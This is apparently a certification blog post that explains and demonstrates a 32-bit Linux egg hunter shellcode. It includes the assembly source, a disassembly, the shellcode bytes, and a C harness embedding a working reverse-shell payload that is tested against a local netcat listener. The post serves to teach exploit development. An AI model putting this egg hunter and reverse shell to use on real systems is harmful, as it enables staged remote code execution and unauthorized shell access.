SLAE32 0x03: Egg Hunter Shellcode
In the classic stack buffer overflow scenario, execution flow can be redirected to a JMP ESP instruction, which results in the execution of the shellcode that follows on the stack. Say that the goal is to execute a reverse shell shellcode that is 100 bytes in length. If at least 100 bytes of buffer space remain after control of execution flow has been obtained (i.e. after the saved return address of the function has been overwritten with a pointer to a JMP ESP instruction), then the shellcode can be stored and executed. If, however, fewer than 100 bytes of buffer space remain, the reverse shell shellcode will not fit. This is where the “Egg Hunter” technique might come into play.
Imagine a scenario where a program called chicken is vulnerable to a stack-based buffer overflow attack. The function within the program that leads to the buffer overflow vulnerability is called calcium and takes two arguments: egghunter and eggshell. The egghunter argument can be abused to trigger the overflow (i.e. the return address of the calcium function can be overwritten using egghunter, and control of the program can be obtained). After control of the program is gained through this vulnerability, only 50 bytes of space remain in the buffer, so a 100 byte reverse shell shellcode would not fit. The eggshell argument of calcium cannot be used to trigger a buffer overflow; however, up to 200 bytes can be written to memory through this argument. Memory for the egghunter and eggshell arguments is allocated in distinct locations.
Through the functionality of calcium
in the chicken
program, a reverse shell shellcode less than 200 bytes in length could be written to memory through the eggshell
argument and an egg hunter shellcode could be injected into memory and executed via the stack buffer overflow caused by the egghunter
argument.
The reverse shell shellcode written to memory via the eggshell argument would be prepended by a key. This key is commonly referred to as an “Egg”, and is often 8 bytes in length on a 32-bit system or process. The 8 byte value chosen for the egg should be highly unlikely to show up anywhere else in memory by chance. The shellcode and its unique egg can therefore be written to memory, but the location of the shellcode within virtual address space is unknown.
Using the 50 bytes of buffer space remaining after program control has been obtained via the stack buffer overflow vulnerability triggered by the egghunter argument, an “Egg Hunter” shellcode would be injected and executed. The egg hunter shellcode would search virtual address space for the unique egg value. Once the location of the egg is found, a JMP instruction can be used to execute the reverse shell shellcode following the egg.
There is a wealth of information available on the subject, and the demo explained below is based primarily on the work of Matt Miller. In particular, the majority of the shellcode outlined below is described in his paper, Safely Searching Process Virtual Address Space. The egg hunter shellcode explanation and analysis by FuzzySecurity was also a valuable source of information regarding egg hunter techniques, although that analysis focuses heavily on Windows rather than on Linux.
The rest of this post will aim to explain, analyze, and demonstrate an egg hunter shellcode inspired by the work of Matt Miller.
Objectives
Create an egg hunter shellcode:
- Create a working demo of the Egg Hunter
- Egg Hunter should be configurable for different payloads
Egg Hunter Shellcode
Explanation
The egg hunter shellcode that will be explained in this section utilizes the access
system call to search virtual address space for the egg value. The system call number for access
is decimal 33
which can be determined from the unistd_32.h
file explained in previous posts.
#define __NR_access 33
From man access
, the access
function checks whether the calling process can access a filename as specified by a pointer to its location in memory. While access
expects two arguments, the egg hunter program functionality is provided by and relies only on the first argument. The two arguments expected by access
are shown below.
int access(const char *pathname, int mode);
If the pointer to the pathname given as argument one points to an area of inaccessible or invalid memory, the EFAULT
error is returned, as detailed below in man access
.
EFAULT pathname points outside your accessible address space.
This is crucial to the egg hunter shellcode, as the return value of the access system call can be examined upon completion to determine whether the egg could possibly be located in the page of memory that includes the specified pointer address. If the access system call returns EFAULT, then the page is not readable and the egg and the subsequent shellcode cannot be located in it. When EFAULT is returned, access is used again to validate a memory address in the next page of memory.
As the egg hunter shellcode does its work, access eventually probes a valid memory page, which is indicated by the absence of the EFAULT value in EAX. When a valid address is found, the shellcode compares the egg value specified within the egg hunter shellcode to the bytes at that address. If they do not match, the address is increased by one, validated again with access, and compared again. That is to say, the search advances one byte at a time until either the 8 byte egg is found or an address in an invalid page is reached. If the egg is found, the egg hunter shellcode jumps to the shellcode that follows it. Otherwise, the process of locating another valid memory address (on a different page of memory) through the access system call is repeated.
The comparison functionality of the egg hunter shellcode is provided by the string comparison instruction SCASD. The SCASD instruction compares the value in EAX (which will be the first 4 bytes of the egg) to the doubleword at the address in EDI. In this egg hunter shellcode, a valid memory address as determined by access will be the target for comparison and will be stored in EDI for this purpose. Additionally, SCASD increases the value stored in EDI by 4 upon completion and sets status flags which can be used to determine the outcome of the comparison.
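The effect of SCASD can be modelled in a few lines of C. This is only an illustrative sketch: the function name is hypothetical, the return value stands in for the zero flag, and the model assumes the direction flag is clear (the case in which EDI is incremented rather than decremented).

```c
#include <stdint.h>

/* Model of SCASD with the direction flag clear: compares EAX with the
 * little-endian doubleword at *edi, advances *edi by 4, and returns 1
 * when the two are equal (the case in which the CPU would set ZF). */
int scasd_model(uint32_t eax, const uint8_t **edi)
{
    const uint8_t *p = *edi;
    uint32_t dword = (uint32_t)p[0]
                   | ((uint32_t)p[1] << 8)
                   | ((uint32_t)p[2] << 16)
                   | ((uint32_t)p[3] << 24);
    *edi = p + 4;   /* EDI moves forward whether or not the values match */
    return dword == eax;
}
```

Because x86 is little-endian, the key 0x50905090 used later in this post matches the byte sequence 90 50 90 50 in memory.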
Through the general processes explained above, the egg will eventually be found in memory and the shellcode immediately following the egg will be executed.
Analysis
The egg hunter shellcode will be explained below. The assembly code will come first, followed by an explanation of the instructions.
xor edx, edx ; clear EDX
First, the EDX
register is cleared using the XOR
instruction. The XOR
instruction has been explained in a previous post. In general terms, when the XOR
instruction specifies the same register as both source and destination, the register will be cleared.
;sets EDX to PAGE_SIZE-1
align_page:
or dx, 0xfff ; sets EDX to fff; e.g. 0x0fff, 0x1fff
inc_address:
inc edx ; increases EDX by one; e.g. 0x1000, 0x2000, 0x2001
The instructions above are referenced by two labels. First, the align_page label is followed by the OR DX, 0xFFF instruction. This sets the low 12 bits of DX, so the low 12 bits of EDX become 0xfff, which is equal to 4095 in decimal, or PAGE_SIZE-1. EDX therefore points at the last byte of the current page. Since a page is the smallest unit of memory management in virtual address space, an invalid address means that the entire page containing it is invalid, so the search can skip straight to the next page. The instruction following the inc_address label increases EDX by one. This label is used multiple times within the complete shellcode and has dual functionality: it “turns” the page when the address checked through access is invalid, and it shifts the SCASD comparison window by 1 byte when a valid memory page is found.
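The page-turning arithmetic can be checked with a short C sketch. The macro and function names are hypothetical, and a 4096-byte page size is assumed, as in the shellcode.

```c
#include <stdint.h>

#define PAGE_MASK_4K 0xfffu  /* PAGE_SIZE-1 for 4096-byte pages */

/* Mirrors "or dx, 0xfff" followed by "inc edx": moves the address to the
 * last byte of its page, then steps onto the first byte of the next page. */
uint32_t next_page_start(uint32_t edx)
{
    return (edx | PAGE_MASK_4K) + 1u;
}
```

For example, an address of 0x2001 is first raised to 0x2fff and then incremented to 0x3000. At the very top of the address space the 32-bit value wraps around to 0, so the search restarts from the lowest page.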
; preparation for SYS_access
; int access(const char *pathname, int mode);
lea ebx, [edx+0x4] ; pathname
push byte 0x21 ; system call number for access
pop eax ; 0x21
int 0x80 ; software interrupt; returns 0xfffffff2 on EFAULT
Now, the registers are set for the access system call. At this point EDX holds the candidate address. The value of EDX+0x4 is passed as the first argument to access through EBX, with the intention of testing whether the address lies in a valid range of virtual address space. Next, the system call number for access in hexadecimal is pushed to the stack, then immediately popped into the EAX register; this sets all of EAX in three bytes without introducing NULL bytes. EAX specifies the access system call to the software interrupt INT 0x80 that follows. If the memory address specified in EBX is invalid, the EFAULT error value is returned in EAX.
; compare return value of SYS_access to find a valid page
cmp al, 0xf2 ; sets ZF when comparison is true
jz align_page ; jumps to align_page when ZF is set
As the return value of access
is currently in EAX
, the CMP
instruction is used to determine whether the memory address checked by access
is invalid. The CMP
instruction is used to compare the low-byte value in AL
to 0xf2
which is the low-byte value for the EFAULT
error return code. If the value in AL
is equal to 0xf2
, the comparison returns true and the zero flag ZF
is set. The JZ
instruction checks ZF
and if ZF
is set, JZ
jumps to the align_page
label which in turn increases the memory page (and thus the memory address checked by access
), resets the registers for access
, calls the access
system call, and checks the result once again. This loop will continue until the return value of access
is not EFAULT
.
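The value 0xf2 follows directly from how the kernel reports errors to a 32-bit caller: the negated error number is placed in EAX. A small C sketch (the function name is hypothetical) makes the arithmetic explicit.

```c
#include <errno.h>
#include <stdint.h>

/* The kernel reports failure to a 32-bit caller as the negated errno in
 * EAX. Returns the byte that would then be visible in AL. */
uint8_t al_for_errno(int err)
{
    uint32_t eax = (uint32_t)(-err);   /* e.g. -14 becomes 0xfffffff2 */
    return (uint8_t)(eax & 0xffu);
}
```

On Linux, EFAULT is 14, so the full return value is 0xfffffff2 and AL is 0xf2. Comparing only AL saves bytes compared with a full 32-bit comparison, at the cost of inspecting just the low byte of the result.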
; prepares for egg hunt
mov eax, 0x50905090 ; 4-byte egghunter key
mov edi, edx ; EDX contains a memory address within a valid page
Once a valid memory address has been located by access, the first four bytes of the egg are moved into EAX. In this case, the egg is the 8 byte value \x90\x50\x90\x50\x90\x50\x90\x50. It is important to note that the first four bytes are identical to the last four bytes, which allows a single 4-byte key in EAX to be checked twice in a row. Next, the value in EDX is moved to EDI, which will later be used by SCASD for string comparison purposes. The value in EDX (and now EDI) is the address currently being examined; on the first pass through a page it is the first byte of a valid memory page.
; hunts for first 4 bytes of egg; scasd sets ZF when match is true
scasd ; compares [EDI] to value in EAX; increments EDI by 4
jnz inc_address ; jumps to inc_address when ZF is not set
At this point, SCASD is used to compare the contents stored at the memory address referenced in EDI (which on the first iteration of the loop would be the first 4 bytes of a valid memory page) to the value in EAX, which is the first four bytes of the egg. If the contents at EDI match the value in EAX, the zero flag ZF is set. SCASD then increments the value in EDI by 4. If ZF is not set (i.e. the comparison failed), JNZ jumps to the inc_address label, which ultimately results in the next comparison starting one memory address higher than the previous one, because EDI is reloaded from the incremented EDX. Note that the access system call happens each time the JNZ condition is met. This allows the loop to continue safely through all memory addresses in a valid page. Once the memory address is increased into an invalid page, the access system call will once again return EFAULT and the align_page loop will be repeated until a new, valid memory page is located.
; hunts for last 4 bytes of egg
scasd ; hunts for last 4 bytes of egg
jnz inc_address
Once the first SCASD succeeds (i.e. once ZF is set because the contents at the memory address in EDI match 0x50905090), the next SCASD string comparison occurs in a similar fashion. Since the first SCASD already increased EDI by 4, this comparison reads the four bytes immediately after the first match and compares them to the value in EAX. If the contents match, the 8 byte egg has been found. If the contents don’t match, the egg hunt continues.
; jumps to beginning of shellcode
jmp edi
Finally, after the egg is found, the JMP instruction is used to redirect execution to the shellcode. Note that after the second SCASD instruction, EDI holds the address at which the egg was found plus 8. This means that the JMP EDI instruction will result in execution continuing beyond the 8 byte egg, at the first byte of the shellcode!
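The search logic analyzed above can be summarized as a user-space model in C. This is a sketch only: it scans an ordinary buffer rather than the process address space, it omits the access page validation, and the function name is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Scans mem[0..len) one byte at a time for two back-to-back copies of the
 * 4-byte key, as the two SCASD instructions do. Returns a pointer to the
 * first byte after the 8-byte egg, or NULL if no egg is present. */
const uint8_t *find_payload_after_egg(const uint8_t *mem, size_t len,
                                      const uint8_t key[4])
{
    if (len < 8)
        return NULL;
    for (size_t i = 0; i + 8 <= len; i++) {
        if (memcmp(mem + i, key, 4) == 0 &&
            memcmp(mem + i + 4, key, 4) == 0)
            return mem + i + 8;   /* equivalent of JMP EDI */
    }
    return NULL;
}
```

Requiring the key twice matters because the hunter itself contains one copy of the key inside its MOV EAX instruction. A search for a single 4-byte match could land on the hunter's own bytes, whereas two consecutive copies only occur in front of the payload.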
Full Code
; egghunter.nasm
; Author: Michael Norris
; Credit: Matt Miller
global _start
section .text
_start:
xor edx, edx ; clear EDX
align_page:
;sets EDX to PAGE_SIZE-1
or dx, 0xfff ; sets EDX to fff; e.g. 0x0fff, 0x1fff
inc_address:
inc edx ; increases EDX by one; e.g. 0x1000, 0x2000, 0x2001
; preparation for SYS_access
; int access(const char *pathname, int mode);
lea ebx, [edx+0x4] ; pathname
push byte 0x21 ; system call number for access
pop eax ; 0x21
int 0x80 ; software interrupt; returns 0xfffffff2 on EFAULT
; compare return value of SYS_access to find a valid page
cmp al, 0xf2 ; sets ZF when comparison is true
jz align_page ; jumps to align_page when ZF is set
; prepares for egg hunt
mov eax, 0x50905090 ; 4-byte egghunter key
mov edi, edx ; EDX contains a memory address within a valid page
; hunts for first 4 bytes of egg; scasd sets ZF when match is true
scasd ; compares [EDI] to value in EAX; increments EDI by 4
jnz inc_address ; jumps to inc_address when ZF is not set
; hunts for last 4 bytes of egg
scasd ; hunts for last 4 bytes of egg
jnz inc_address
; jumps to beginning of shellcode
jmp edi
Compile & Test
Compiling & Examining the Assembly
The egghunter shellcode egghunter.nasm
is assembled and linked as explained in previous posts. The commands used were run on 64-bit Kali Linux. To start, the code should be assembled with /usr/bin/nasm
as shown below. As the program is written in x86 assembly, the elf32
file type is specified using the -f
flag.
root@kali:~/workspace/SLAE# nasm -f elf32 egghunter.nasm -o egghunter.o
With the code assembled, the next step is to link the egghunter.o
file with /usr/bin/ld
. The -m
flag specifies that the elf_i386
emulation linker should be used.
root@kali:~/workspace/SLAE# ld -m elf_i386 egghunter.o -o egghunter
Now that egghunter has been assembled and linked, it can be disassembled using /usr/bin/objdump
for further examination. Using the command shown below, the operation codes can be examined for any NULL
characters. The output has been truncated to conserve space.
root@kali:~/workspace/SLAE# objdump -d ./egghunter -M intel
./egghunter: file format elf32-i386
Disassembly of section .text:
08049000 <_start>:
8049000: 31 d2 xor edx,edx
08049002 <align_page>:
8049002: 66 81 ca ff 0f or dx,0xfff
08049007 <inc_address>:
8049007: 42 inc edx
8049008: 8d 5a 04 lea ebx,[edx+0x4]
804900b: 6a 21 push 0x21
804900d: 58 pop eax
804900e: cd 80 int 0x80
8049010: 3c f2 cmp al,0xf2
8049012: 74 ee je 8049002 <align_page>
8049014: b8 90 50 90 50 mov eax,0x50905090
8049019: 89 d7 mov edi,edx
804901b: af scas eax,DWORD PTR es:[edi]
804901c: 75 e9 jne 8049007 <inc_address>
804901e: af scas eax,DWORD PTR es:[edi]
804901f: 75 e6 jne 8049007 <inc_address>
8049021: ff e7 jmp edi
Upon confirmation, the shellcode can be extracted using the bash one-line command outlined in previous posts. The resulting egghunter
shellcode is shown below.
\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x90\x50\x90\x50\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7
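Checking the extracted bytes for NULL characters by eye is error-prone, so the check can also be automated. The following C sketch uses a hypothetical helper name and simply reports the position of the first 0x00 byte, if any.

```c
#include <stddef.h>

/* Returns the index of the first 0x00 byte in sc[0..len), or -1 if the
 * buffer contains no NULL bytes. */
long first_null_byte(const unsigned char *sc, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (sc[i] == 0x00)
            return (long)i;
    }
    return -1;
}
```

The length must be passed explicitly (for example with sizeof on the array, minus one for the string terminator) rather than computed with strlen, since strlen itself stops at the first NULL byte and would hide the problem.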
Demonstrating the Egg Hunter
As demonstrated in previous posts, the sc_test.c
program can be used to test the egghunter
shellcode. As the Egg Hunter technique is a type of staged payload, the egghunter
portion cannot be tested without a complementary shellcode that is prepended by the 8-byte egg as explained earlier in this post. With that being said, the shell_reverse_tcp
reverse shell shellcode from the “Create A Shell_Reverse_TCP Shellcode” paper will be used for this purpose. Additionally, sc_test.c
has been modified to print the length of the egghunter
shellcode as well as the length of shell_reverse_tcp
shellcode prepended with the 8-byte egg.
To test the egghunter
shellcode with a different payload, simply replace the payload contents below the /* Current payload: */
comment with the desired shellcode payload. The source code for this file can be found on GitHub.
#include <stdio.h>
#include <string.h>
/*
To compile:
gcc -m32 -fno-stack-protector -z execstack sc_test.c -o sc_test
*/
unsigned char egghunter[] = \
"\x31\xd2\x66\x81\xca\xff\x0f\x42"
"\x8d\x5a\x04\x6a\x21\x58\xcd\x80"
"\x3c\xf2\x74\xee\xb8\x90\x50\x90"
"\x50\x89\xd7\xaf\x75\xe9\xaf\x75"
"\xe6\xff\xe7";
unsigned char shellcode[] = \
/* Egg */
"\x90\x50\x90\x50\x90\x50\x90\x50"
/* Insert any other payload below */
/* Current payload: Reverse Shell TCP */
"\x31\xdb\xf7\xe3\x52\x6a\x01\x6a"
"\x02\x89\xe1\xfe\xc3\xb0\x66\xcd"
"\x80\x89\xc3\xbf\xff\xff\xff\xff"
"\xb9\x80\xff\xff\xfe\x31\xf9\x51"
"\x66\x68\x11\x5c\x66\x6a\x02\x89"
"\xe1\x6a\x10\x51\x53\x89\xe1\xb0"
"\x66\xcd\x80\x89\xd1\xb0\x3f\xcd"
"\x80\xfe\xc1\xb0\x3f\xcd\x80\xfe"
"\xc1\xb0\x3f\xcd\x80\x52\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xd1\x89\xe3\xb0\x0b\xcd\x80";
int main(void)
{
printf("Egghunter Length: %zu\n", strlen((const char *)egghunter));
printf("Shellcode Length: %zu\n", strlen((const char *)shellcode));
int (*ret)() = (int(*)())egghunter;
ret();
}
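Instead of editing the array by hand for each payload, the egg could also be prepended programmatically. The sketch below is one possible approach, not part of the original sc_test.c; the function name and parameters are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Writes key||key||payload into out and returns the number of bytes
 * written, or 0 if out (of capacity out_cap) is too small. */
size_t prepend_egg(const uint8_t key[4],
                   const uint8_t *payload, size_t payload_len,
                   uint8_t *out, size_t out_cap)
{
    size_t total = 8 + payload_len;
    if (total < payload_len || total > out_cap)   /* overflow or no room */
        return 0;
    memcpy(out, key, 4);
    memcpy(out + 4, key, 4);
    memcpy(out + 8, payload, payload_len);
    return total;
}
```

The 4-byte key passed in must match the constant loaded by the MOV EAX instruction in the egg hunter, byte for byte in memory order (90 50 90 50 for the key used in this post).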
As explained in the testing of shell_reverse_tcp
, the same general steps should be taken here to test the egghunter
shellcode. If the egghunter
shellcode successfully locates the egg that prepends shell_reverse_tcp
, a reverse shell will be returned to the listening system on a specified IP address and port. The entire process is outlined again below.
The above program is compiled using the command shown below, as suggested in the commented program code.
root@kali:~/workspace/SLAE# gcc -m32 -fno-stack-protector -z execstack sc_test.c -o sc_test
Before sc_test
is executed, a nc
or ncat
listener should be set up in a separate terminal window to act as the remote system to which the reverse shell should connect.
root@kali:~/workspace/SLAE# nc -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
The default IP address used in the shell_reverse_tcp
shellcode is 127.0.0.1
and the default listening port is 4444
. Once the listener is configured, running sc_test
results in a shell on the system, which confirms that the egghunter
shellcode successfully located the shell_reverse_tcp
shellcode prepended by the \x90\x50\x90\x50\x90\x50\x90\x50
egg.
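Reading the payload bytes listed in sc_test.c, the port appears as the pair \x11\x5c (4444 in network byte order), and the address appears to be stored XOR-masked against 0xffffffff (\x80\xff\xff\xfe decodes to 7f 00 00 01), presumably to keep NULL bytes out of the payload. Assuming that interpretation is correct, the bytes for a different listener could be computed as in the following sketch; the function names are hypothetical.

```c
#include <stdint.h>

/* Port in network byte order (high byte first), e.g. 4444 -> 11 5c. */
void encode_port(uint16_t port, uint8_t out[2])
{
    out[0] = (uint8_t)(port >> 8);
    out[1] = (uint8_t)(port & 0xff);
}

/* IPv4 octets XORed with 0xff so that octets of 0x00 never appear
 * literally. The payload is assumed to undo this with its own XOR
 * against 0xffffffff before using the address. */
void encode_ip_masked(const uint8_t ip[4], uint8_t out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(ip[i] ^ 0xff);
}
```

Under this scheme an address containing an octet of 255, or a port with a zero byte, would still introduce a NULL byte, so the result is worth checking before use.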
In the terminal window that runs sc_test
:
root@kali:~/workspace/SLAE# ./sc_test
Egghunter Length: 35
Shellcode Length: 96
And in the terminal window that runs nc
:
root@kali:~/workspace/SLAE# nc -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:41410.
ls -lah | grep egghunter
-rwxr-xr-x 1 root root 4.5K Oct 13 22:17 egghunter
-rw-r--r-- 1 root root 489 Oct 13 22:17 egghunter.nasm
-rw-r--r-- 1 root root 512 Oct 13 22:17 egghunter.o
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student ID: SLAE-1469